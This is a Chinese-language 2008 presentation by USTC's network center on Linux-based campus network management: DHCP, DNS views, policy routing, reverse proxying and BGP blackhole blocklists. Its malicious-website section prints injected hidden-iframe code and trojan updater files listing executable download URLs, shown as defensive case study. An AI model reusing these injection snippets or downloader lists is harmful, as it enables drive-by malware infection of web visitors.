版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
Linux系統(tǒng)
在科大校園網管理中的應用張煥杰email/msn:james@中國科學技術大學網絡信息中心2008-11-82024/8/201Linux系統(tǒng)在科大校園網管理中的應用主要內容中國科大校園網絡歷史與現(xiàn)狀網絡基礎設施網絡管理系統(tǒng)網絡服務KD-50-I基于龍芯2F的萬億次高性能機2024/8/202Linux系統(tǒng)在科大校園網管理中的應用中國科大校園網絡的發(fā)展歷史1993年開始規(guī)劃1994年建成FDDI主干的校園網6臺FDDI路由器,24個10M子網1995年連接中國教育和科研網CERNET1999年連接ChinaNET2000年改造為千兆以太網主干2005年改造為萬兆主干,全面支持IPv62024/8/203Linux系統(tǒng)在科大校園網管理中的應用10GCERNET西區(qū)核心節(jié)點網絡信息中心東校區(qū)西校區(qū)南校區(qū)服務器群超級計算平臺CNCNET中國科學技術大學校園網絡主干及出口示意圖1G200M1G600MCERNET2CHINANET教三樓生命科學學院加速器計算機科學系信息學院火災科學實驗室高性能計算中心圖書館西區(qū)活動中心力三樓力二樓力一樓南區(qū)教學樓南區(qū)辦公樓MBA中心軟件學院南區(qū)圖書館南區(qū)實驗樓南區(qū)學生宿舍防火墻防火墻防火墻防火墻西區(qū)學生宿舍力四樓南區(qū)匯聚節(jié)點東區(qū)學生宿舍行政辦公樓理化中心大樓理化一號樓大禮堂微尺度物理樓數(shù)學樓教一樓教二樓化學樓藝術樓出版社東區(qū)活動中心繼續(xù)教育學院電四樓電子工程與信息系10G科研樓東區(qū)核心節(jié)點網絡中心核心節(jié)點計算中心匯聚節(jié)點校園無線網覆蓋2024/8/204Linux系統(tǒng)在科大校園網管理中的應用中國科大校園網現(xiàn)狀萬兆主干,支持IPv4、IPv63臺核心交換機處理3層路由其他設備當作2層交換機使用IPv4/IPv6雙棧通過VRF-lite(VPNRoutingandForwardingLite)支持2個IP地址空間4個出口CERNET/CERNET2電信/網通從CNNIC申請了16C地址以利用電信出口2024/8/205Linux系統(tǒng)在科大校園網管理中的應用中國科大校園網現(xiàn)狀校園網上看到的校內計算機數(shù)1天內活動的,12000臺7天內活動的,16000臺安裝IPv6協(xié)議的機器數(shù)1天內活動的,1200臺7天內活動的,2000臺是CERNET合肥主節(jié)點,CERNET2合肥節(jié)點,同時也是安徽省教育科研網中心2024/8/206Linux系統(tǒng)在科大校園網管理中的應用1天內活動的IPv4機器數(shù)2024/8/207Linux系統(tǒng)在科大校園網管理中的應用校園網”網絡天氣圖”2024/8/208Linux系統(tǒng)在科大校園網管理中的應用科大校園網絡提供的服務隨時隨地的高帶寬網絡接入服務全校使用DHCP自動分配IP地址IPv4/IPv6雙棧多種網絡應用服務多達1G的郵件/主頁VOD等Internet應用電子校務等業(yè)務系統(tǒng)對個人用戶,網絡費用的分擔以包月方式靈活方便的“網絡通”服務2024/8/209Linux系統(tǒng)在科大校園網管理中的應用安徽省教育科研網絡主干示意圖蕪湖市安徽師范大學安慶市安慶師范學院銅陵市銅陵學院池州市池州學院黃山市黃山學院宣城市宣城職業(yè)技術學院馬鞍山市安徽工業(yè)大學巢湖市巢湖學院蚌埠市安徽財經大學宿州市宿州學院淮北市淮北煤炭師范學院亳州市亳州職業(yè)技術學院阜陽市阜陽師范學院CERNET武漢南京2.5G155M155MSDH南環(huán)9個市共享155MSDH北環(huán)7個市共享合肥市安徽農業(yè)大學安徽醫(yī)科大學安徽建工學院三聯(lián)職業(yè)技術學院安徽考試院合肥工業(yè)大學合肥師范學院安徽新華學院安徽經濟管理學院安徽電教館安徽教育廳安徽中醫(yī)學院合肥學院電子工程學院安徽大學淮南市安徽理工大學滁州市滁州學院六安市皖西學院中國科學技術大學省網中心2024/8/2010Linux系統(tǒng)在科大校園網管理中的應用合肥中心節(jié)點網絡天氣圖2024/8/2011Linux系統(tǒng)在科大校園網管理中的應用安徽省教育科研網主干155M環(huán)網2024/8/2012Linux系統(tǒng)在科大校園網管理中的應用校園網絡管理理念開放的校園網絡只要是支持TCP/IP的系統(tǒng),都能接入應用只要不違反法律法規(guī),不影響網絡運行,都應該支持以用戶為中心接入方式多,滿足各種用戶需要方便使用,盡量少設置障礙,讓用網絡像用電用水一樣方便網絡資源用足、用透2024/8/2013Linux系統(tǒng)在科大校園網管理中的應用2024/8/2014Linux系統(tǒng)在科大校園網管理中的應用2024/8/2015Linux系統(tǒng)在科大校園網管理中的應用2024/8/2016Linux系統(tǒng)在科大校園網管理中的應用網絡基礎設施DNSDHCP認證/計費網絡通出口控制學生宿舍計費控制WWW/反向代理VPN接入2024/8/2017Linux系統(tǒng)在科大校園網管理中的應用DNS服務網絡最基本服務RedHatEnterpriseLinuxASrelease4Bind9.2.4特點:3個view,分別對應CERNET、電信、其他部分的用戶,各自查詢的結果是不同IP,如,分別對應682024/8/2018Linux系統(tǒng)在科大校園網管理中的應用DHCP服務全校范圍內使用DHCP方式分配IPv4地址DHCP并不是為了節(jié)省IP地址,而是為了方便用戶優(yōu)點方便用戶,尤其是對移動用戶管理簡單缺點穩(wěn)定性不高一旦私設DHCPServer,會引起混亂,根據實際運行的經驗,這種情況經常出現(xiàn)2024/8/2019Linux系統(tǒng)在科大校園網管理中的應用DHCPServer使用Linux下的DHCPServerDHCPServer的行為由配置文件控制Linux下由程序生成配置文件,以此控制DHCPServer的行為Linux下的DHCPServer支持shared-network,即一個物理網段可以有多個IP網段如,某個子網,原來為/,后來機器多了,IP地址不夠用,可以增加/,原有的機器不需要修改2024/8/2020Linux系統(tǒng)在科大校園網管理中的應用對DHCPServer的控制自動將一些靜態(tài)IP地址從DHCP地址池中排除校內主要使用DHCP分配IP,也可以靜態(tài)設定IP地址。一旦向網絡信息中心申請某個IP地址靜態(tài)設定,設定的IP地址要從地址池中自動排除做法是定時(每隔10分鐘)從數(shù)據庫中讀出配置信息,讀出靜態(tài)IP地址信息,自動產生配置文件,重新啟動DHCPServer2024/8/2021Linux系統(tǒng)在科大校園網管理中的應用對DHCPServer的控制將一些用戶私自設立的靜態(tài)IP地址排除對于私自設立的靜態(tài)IP地址,也要排除為了避免IP地址沖突,DHCP在分配一個IP地址給用戶的時候,會先ping一下,如果能ping通,說明已經在用,不會分配該IP。由于很多機器設立了個人防火墻,現(xiàn)在ping的結果已經不可靠,這種工作方式經常會產生IP地址沖突我們的做法是通過snmp協(xié)議,收集3層交換機上的ARP表(即IP-MAC對應表)信息,一旦發(fā)現(xiàn)某個不是DHCP分配的IP對應有MAC地址信息,即從地址池中排除該IP2天2024/8/2022Linux系統(tǒng)在科大校園網管理中的應用DHCP系統(tǒng)的監(jiān)控除了定期檢查是否有DHCP_NAK消息判斷是否有私設的DHCPServer外,還應該對DHCPServer的工作狀態(tài)進行監(jiān)視,尤其要關注IP地址池中IP地址的利用率通過分析DHCPServer的IP地址分配記錄,結合固定的IP地址,用戶私設的IP地址,統(tǒng)計出各個網段的IP地址利用率2024/8/2023Linux系統(tǒng)在科大校園網管理中的應用2024/8/2024Linux系統(tǒng)在科大校園網管理中的應用認證/計費2個數(shù)據庫1個sybase,存放帳務信息1個mysql,存放帳號信息,從sybase同步數(shù)據Mysql結構基于freeradius,增加了一些字段Freeradius提供2個認證入口PPP電話撥號radius認證VPNradius認證網絡通的web界面則直接訪問mysql數(shù)據庫2024/8/2025Linux系統(tǒng)在科大校園網管理中的應用網絡通出口控制介紹“網絡通”服務利用一個用戶名和密碼,具有如下功能:校內無線接入撥號接入90路撥號系統(tǒng)滿足校內家屬區(qū)用戶使用VPN接入2個出口/2種類型的VPN接入服務PPTP/OpenVPN,均提供電信/網通上用戶的接入靈活的對外訪問服務用戶從校內可以自由選擇多種出口組合對外訪問2024/8/2026Linux系統(tǒng)在科大校園網管理中的應用出口管理網絡費用分擔的需要緩解帶寬有限與需求無限的矛盾1%的用戶使用超過10%的帶寬10%的用戶使用超過50%的帶寬P2P應用普及,更是極大地放大了用戶的需求如何有效利用多個出口個人用戶與集團用戶的統(tǒng)一考慮集團用戶:很多實驗室建立子網,通過地址轉換設備連接到校園網2024/8/2027Linux系統(tǒng)在科大校園網管理中的應用出口Web登錄認證是“網絡通”服務的主要組成部分用戶自主選擇教育網、電信、網通出口的組合來訪問校外網絡采用包月制按照連接數(shù)付費的計費原則,集團用戶可以按照用戶規(guī)模的大小,選擇更多的連接數(shù)所有校內用戶,包括VPN連進來的用戶,都可以使用2024/8/2028Linux系統(tǒng)在科大校園網管理中的應用2024/8/2029Linux系統(tǒng)在科大校園網管理中的應用2024/8/2030Linux系統(tǒng)在科大校園網管理中的應用網絡通原理教育網出口Linux機器校內網絡電信出口NAT1網通出口NAT電信出口NAT2電信出口NAT3Linux機器完成認證、策略路由抓包分析Linux機器2024/8/2031Linux系統(tǒng)在科大校園網管理中的應用內部的一種數(shù)據結構100101102100….100101102100….100101102100….長度256*32長度256*16長度256*16一個數(shù)組存放校內的IP段信息每段有個數(shù)組存放該段的策略信息修改路由時查找規(guī)則表的處理過程,利用以上結構來查2024/8/2032Linux系統(tǒng)在科大校園網管理中的應用用戶TCP連接數(shù)限制采用限制用戶TCP連接數(shù)的方式來限制P2P應用占用的帶寬目前采用旁路控制程序隔2分鐘抓包分析,對于超限制的或有DoS攻擊異常行為(比如出去的數(shù)據包遠遠多于進來的)的IP直接從Web登錄上踢下去,并發(fā)消息給用戶提示用戶可以通過多繳費增加連接數(shù)限制,方便大的實驗室共享上網,這在學校里非常普遍抓包的內容放在數(shù)據庫中,方便掌握流量異常記錄2024/8/2033Linux系統(tǒng)在科大校園網管理中的應用學生宿舍計費控制采用直接控制交換機端口開、關的方式數(shù)據庫中記錄宿舍信息點和交換機端口的對應信息通過snmp協(xié)議控制交換機對應接口的Adminstatus,如果Adminstatus設置為enable,信息點開通,如果設置為disable,信息點禁用以上控制對用戶完全透明,只要信息點繳費后開通,用戶用起來跟在校內其他地方一樣使用net-snmp來控制2024/8/2034Linux系統(tǒng)在科大校園網管理中的應用WWW/反向代理公網對校內的各種服務器訪問速度經常不理想既然有多個出口,應該充分利用這些出口,來提高外網用戶對服務器的訪問速度兩個問題需要解決如何通過DNS服務器的設置,把外網用戶對服務器的解析分散到不同的IP上如何解決外網用戶訪問多個IP地址對同一個服務器的訪問2024/8/2035Linux系統(tǒng)在科大校園網管理中的應用外網對服務器訪問的優(yōu)化利用Linux下DNS服務器bind,針對不同區(qū)域(運營商)的IP設置多個view不同來源的IP,查詢同一個域名返回不同出口的IP地址CERNET
IP查詢返回CERNETIP電信IP查詢返回電信IP其他查詢返回網通IP做法可以googlebindview2024/8/2036Linux系統(tǒng)在科大校園網管理中的應用外網對服務器訪問的優(yōu)化基本原則:任何外網都能正常訪問服務器對應的任何一個IP,最多是速度不同。多個IP地址對同一個服務器的訪問服務器多網卡設置多個IP地址,利用服務器的策略路由功能實現(xiàn),只能在Linux上使用,適合流量大的服務器專門的地址轉換設備,利用地址轉換實現(xiàn),適合小規(guī)模的校園網設立反向代理服務器或7層交換機實現(xiàn),適用面廣,使用方便我們使用Nginx作為反向代理,設置3個IP地址,用來對上百個校內網站進行反向代理。Nginx處理的連接數(shù)比squid高1個量級,CPU占用低1個量級。通過以上設置,外部用戶對服務器的訪問速度有非常明顯的提高2024/8/2037Linux系統(tǒng)在科大校園網管理中的應用服務器多IP策略路由的設置ip
addradd0/25deveth0iprouteadd0/0via26table100vconfigaddeth010ipaddadd0/25deveth0.10iprouteadd0/0via26table101iprouteadd/19via26table99ipruleaddfrom0/0table99pref90ipruleaddfrom0table101pref100ipruleaddfrom0table100pref1012024/8/2038Linux系統(tǒng)在科大校園網管理中的應用反向代理工作示意圖電信其它CERNETDNS反向代理WWW1WWW2WWW3121.DNS查詢2.HTTP訪問2024/8/2039Linux系統(tǒng)在科大校園網管理中的應用Nginx統(tǒng)計2024/8/2040Linux系統(tǒng)在科大校園網管理中的應用VPN接入PPTP與OpenVPN兩種VPN,CERNET、電信、網通接入點PPTP以前基于Windows,現(xiàn)在改為基于LinuxOpenVPN基于Linux,采用橋接方式,直接支持IPv6均使用radius協(xié)議認證,并記錄下使用者的公網IP和分配的校園網IP等日志信息2024/8/2041Linux系統(tǒng)在科大校園網管理中的應用網絡管理系統(tǒng)配置文件管理環(huán)境監(jiān)視、短信報警流量監(jiān)視惡意網站的封堵2024/8/2042Linux系統(tǒng)在科大校園網管理中的應用配置文件管理rancid每天凌晨把關鍵網絡設備的信息,包括硬件信息\配置信息取回來,存放到cvs里并把diff的結果mail給管理員這樣可以方便的跟蹤配置修改歷史2024/8/2043Linux系統(tǒng)在科大校園網管理中的應用環(huán)境監(jiān)視、短信報警設備太多,無專人值班設立各種設備服務監(jiān)視的短信報警系統(tǒng)Linux下,基于smstools開發(fā),通過寫腳本來擴展監(jiān)視的對象對環(huán)境狀況、UPS狀況、設備通斷、服務正常與否等信息自動監(jiān)視分類型、分時段發(fā)短信給不同的管理員2024/8/2044Linux系統(tǒng)在科大校園網管理中的應用流量監(jiān)視長期流量趨勢監(jiān)視MRTG、cacti等,原理是利用snmp協(xié)議讀取設備的統(tǒng)計信息,計算出流量等信息當前流量直觀顯示網絡天氣圖瞬間流量記錄把統(tǒng)計連接數(shù)的抓包結果,整理后,每隔20分鐘保存在數(shù)據庫中記錄有每個IP在抓包瞬間的流量統(tǒng)計2024/8/2045Linux系統(tǒng)在科大校園網管理中的應用2024/8/2046Linux系統(tǒng)在科大校園網管理中的應用2024/8/2047Linux系統(tǒng)在科大校園網管理中的應用2024/8/2048Linux系統(tǒng)在科大校園網管理中的應用2024/8/2049Linux系統(tǒng)在科大校園網管理中的應用惡意網站對校園網的影響惡意網站內容不合法的反動、黃色網站網絡釣魚網站最常見的qq中獎、taobao中獎、msn釣魚等網站,目的是騙取用戶名和密碼傳播病毒、木馬等惡意程序的網站是大部分ARP攻擊的直接或間接源頭直接影響校園網的正常運行2024/8/2050Linux系統(tǒng)在科大校園網管理中的應用惡意網站的實例內嵌惡意代碼的網站瀏覽器訪問時,如果存在漏洞,會自動下載木馬軟件等惡意軟件,在用戶后臺執(zhí)行通常利用flash、realplayer、windows下的漏洞這些網站往往會被嵌入到正常的網站上,俗稱被“掛馬”惡意代碼中轉站為了幫助木馬程序的更新,設立一些下載網站,木馬程序啟動后,自動下載最新的程序代碼2024/8/2051Linux系統(tǒng)在科大校園網管理中的應用一個“掛馬”例子深圳職業(yè)技術學院汽車與交通學院http:///ReadNews.asp?NewsID=809這個網頁中有下面一段代碼<scriptsrc=/1.js>1.js內容是<iframe
src=/a0076159/a07.htmwidth=100height=0></iframe>/a0076159/a07.htm的內容是<iframewidth=100height=0src=new.html></iframe>new.html是利用幾個媒體播放漏洞下載惡意軟件的代碼2024/8/2052Linux系統(tǒng)在科大校園網管理中的應用一個網站被掛了多個“馬”LogisgeneratedbyFreShow.
[wide]/
[script]/include/javascript/common.js
[frame]/b7.htm?a023
[frame]/flash.htm
[frame]/14.htm
[frame]/office.htm
[frame]/lz.htm
[frame]/re10.htm
[frame]/re11.htm
[frame]/fs/7.htm
[frame]/a192/fxx.htm
[frame]/a192/fx.htm
[frame]/a192/ilink.html
[frame]/a192/flink.html
[frame]/a192/ss.html
[frame]/a192/ms06014.htm
[frame]/a192/GLWORLD.html
[frame]/sina.htm
[frame]/UU.htm
[frame]/a192/Thunder.html
[frame]/a192/real.htm
[frame]/a192/Real.html2024/8/2053Linux系統(tǒng)在科大校園網管理中的應用惡意代碼中轉站感染病毒的機器會下載/1234.txt
這個文件內容是
[oo]
c0=http://1.111991.net/0.exe
c1=http://1.111991.net/1.exe
c2=http://1.111991.net/2.exe
c3=http://1.111991.net/3.exe
c4=http://1.111991.net/4.exe
c5=http://1.111991.net/5.exe
c6=http://1.111991.net/6.exe
c7=http://1.111991.net/7.exe
c8=http://1.111991.net/8.exe
c9=http://1.111991.net/9.exe
2008年5月5日開始關注類似的訪問序列2024/8/2054Linux系統(tǒng)在科大校園網管理中的應用惡意代碼中轉站(2)/0808xo.html內容是:2008-09-17/mma/1.exe2008-09-15/mma/2.exe2008-09-20/mma/3.exe2008-09-21/mma/4.exe2008-09-23/mma/5.exe2008-09-21/mma/6.exe2008-09-12/mma/7.exe2008-09-13/mma/8.exe2008-08-08/mma/9.exe2024/8/2055Linux系統(tǒng)在科大校園網管理中的應用2024/8/2056Linux系統(tǒng)在科大校園網管理中的應用2024/8/2057Linux系統(tǒng)在科大校園網管理中的應用惡意代碼中轉站(3)/dz.asp內容是[update]date=20080923[file]isfile=1count=28url1=/ma/cw01.exemark1=aaurl2=/ma/cw02.exemark2=bburl3=/ma/cw03.exemark3=ccurl4=/ma/cw04.exe2024/8/2058Linux系統(tǒng)在科大校園網管理中的應用2024/8/2059Linux系統(tǒng)在科大校園網管理中的應用惡意代碼中轉站(4)http:///mm.txt內容是[oo]c0=08/new/new1.exec1=08/new/new2.exec2=08/new/new3.exec3=08/new/new4.exec4=08/new/new5.exec5=08/new/new6.exec6=08/new/new7.exe2024/8/2060Linux系統(tǒng)在科大校園網管理中的應用獲取以上信息的方式某些論壇,如
/bbs/forum-31-1.html
/forumdisplay.php?fid=22http:///report.asp從校園網對外訪問的日志中分析如果計算機有ARP攻擊行為,可以查找該IP在有ARP攻擊行為前的日志查找訪問較明顯序列的日志,如1.exe2.exe3.exe用戶報告發(fā)現(xiàn)可疑的下載,可以把文件提交給
/
測試,檢查是否是惡意軟件2024/8/2061Linux系統(tǒng)在科大校園網管理中的應用惡意網站的一般封堵方法客戶端封堵某些瀏覽器或個人防火墻在訪問惡意網站的時候,會給出提示,并阻擋訪問校園出口封鎖防火墻檢測到下載惡意軟件時可以阻擋IPS入侵防御系統(tǒng)可以阻斷管理員手工增加黑名單路由,更新復雜,維護成本高網絡主干封鎖增加黑名單路由,發(fā)往這些地方的數(shù)據包被丟棄教育網主干增加了約150條黑名單路由,禁止對這些IP的訪問但由于大部分學校都用其他出口,因此封堵效果一般2024/8/2062Linux系統(tǒng)在科大校園網管理中的應用教育網主干網黑名單路由例子hef1-bgw>showiproute|incB9[200/70]via,2d11hB96[200/70]via,2d11hB19[200/70]via,2d11hB36[200/70]via,2d11hB36/32[200/70]via,2d11hB04/32[200/70]via,2d11hB89/32[200/70]via,2d11hB13/32[200/70]via,2d11hB32[200/70]via,2d11hB34/32[200/70]via,2d11hB3/32[200/70]via,2d11h2024/8/2063Linux系統(tǒng)在科大校園網管理中的應用在路由器上封鎖IP的方式首先在路由器上增加null0路由iproute55null0把要封鎖IP的下一跳設置為,如要封鎖3直接增加靜態(tài)路由
iproute355
需要在所有路由器上增加利用BGP注入路由(遠程觸發(fā)黑洞路由,Remote-TriggeredBlackHoleRouting
)在一個觸發(fā)路由器上增加,利用BGP廣播給其他路由器做法可以參考/3c6vl7
(WormMitigationTechnicalDetails
)2024/8/2064Linux系統(tǒng)在科大校園網管理中的應用觸發(fā)路由器設置routerbgp999...redistributestaticroute-mapSTATIC-TO-BGP...route-mapSTATIC-TO-BGPpermit10matchtag66setipnext-hopsetcommunityno-export999:000setoriginigp
route-mapSTATIC-TO-BGPpermit20...iproute355Null0Tag662024/8/2065Linux系統(tǒng)在科大校園網管理中的應用遠程觸發(fā)黑洞路由優(yōu)缺點優(yōu)點在一臺觸發(fā)路由器上配置,自動廣播到其他路由器,使用方便數(shù)據包是在最近的路由器上丟棄缺點手工修改配置比較麻煩無法有效的跟蹤相關信息(如:什么時候增加的,增加的原因)無法自動刪除黑名單,必須要手工刪除總之,管理員比較辛苦2024/8/2066Linux系統(tǒng)在科大校園網管理中的應用利用BGP協(xié)議的自動封堵方法黑名單信息存放在數(shù)據庫中黑名單信息管理方式管理員通過Web界面添加/刪除黑名單程序與入侵檢測系統(tǒng)自動進行添加/刪除管理員在添加時可以設置有效期,到期后自動刪除通過一個簡單的BGP客戶端,把數(shù)據庫里的黑名單信息發(fā)送給路由器剩下的操作與傳統(tǒng)遠程觸發(fā)黑洞路由完全一樣2024/8/2067Linux系統(tǒng)在科大校園網管理中的應用路由服務器與接收黑名單的路由器配置WEB界面管理數(shù)據庫路由服務器路由器BGP協(xié)議BGP協(xié)議備用路由服務器BGP協(xié)議2024/8/2068Linux系統(tǒng)在科大校園網管理中的應用路由器上的配置routerbgp64600nosynchronizationneighbor7remote-as64512neighbor7ebgp-multihop255neighbor41remote-as64512neighbor41ebgp-multihop255noauto-summaryiproute55Null0iproute755next_hopiproute4155next_hop注:64600是自治域號,隨便使用一個號就可以7是路由服務器IP2024/8/2069Linux系統(tǒng)在科大校園網管理中的應用測試情況2008年7月開始在中國科大校園網使用這樣方式來管理黑名單,2008年8月底,東北大學加入測試,2008年9月底,安徽兩所大學加入測試,2008年10月,蘭州大學、電子科大加入測試目前封鎖了近500個IPhttp:///校內ARP攻擊數(shù)量的變化情況,以中國科大為例之前每天都有,多的時候一天有10起以上現(xiàn)在很少,一周可能有1起,且大部分是外面帶來的機器引起至今運行穩(wěn)定節(jié)省了各個學校自己維護IP黑名單的精力2024/8/2070Linux系統(tǒng)在科大校園網管理中的應用Web界面(還在開發(fā)中)2024/8/2071Linux系統(tǒng)在科大校園網管理中的應用進一步發(fā)展擴大IP黑名單測試范圍,讓更多的學校參與測試盡快開發(fā)Web界面,讓更多的人來管理黑名單,經過審核后生效,加快黑名單的更新過程,實現(xiàn)完備的黑名單管理開發(fā)一個蜜罐系統(tǒng)來處理用戶對黑名單IP的訪問,而不是目前簡單丟棄的方式。通過該系統(tǒng),可以告訴用戶對黑名單IP的訪問是有危害的,并且可以統(tǒng)計對不同黑名單IP的訪問2024/8/2072
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024版勞務加工承包合同范本
- 2024年藝術品買賣合同賠償條例
- 2025年度新型城鎮(zhèn)化租賃住房建設合同4篇
- 2025年度智能家居項目瓷磚材料供應合同4篇
- 2025年度體育場館搭棚施工及維護管理合同4篇
- 2024版鎳氫電池產品銷售合同
- 2025年度學校食堂及餐飲服務承包合同范本4篇
- 2025年度新能源汽車購置合同示范文本4篇
- 2025年度特色農家樂經營權轉讓合同范本3篇
- 2025年度智能窗簾控制系統(tǒng)研發(fā)與市場推廣合同4篇
- 特種設備行業(yè)團隊建設工作方案
- 眼內炎患者護理查房課件
- 肯德基經營策略分析報告總結
- 買賣合同簽訂和履行風險控制
- 中央空調現(xiàn)場施工技術總結(附圖)
- 水質-濁度的測定原始記錄
- 數(shù)字美的智慧工業(yè)白皮書-2023.09
- -安規(guī)知識培訓
- 2021-2022學年四川省成都市武侯區(qū)部編版四年級上冊期末考試語文試卷(解析版)
- 污水處理廠設備安裝施工方案
- 噪聲監(jiān)測記錄表
評論
0/150
提交評論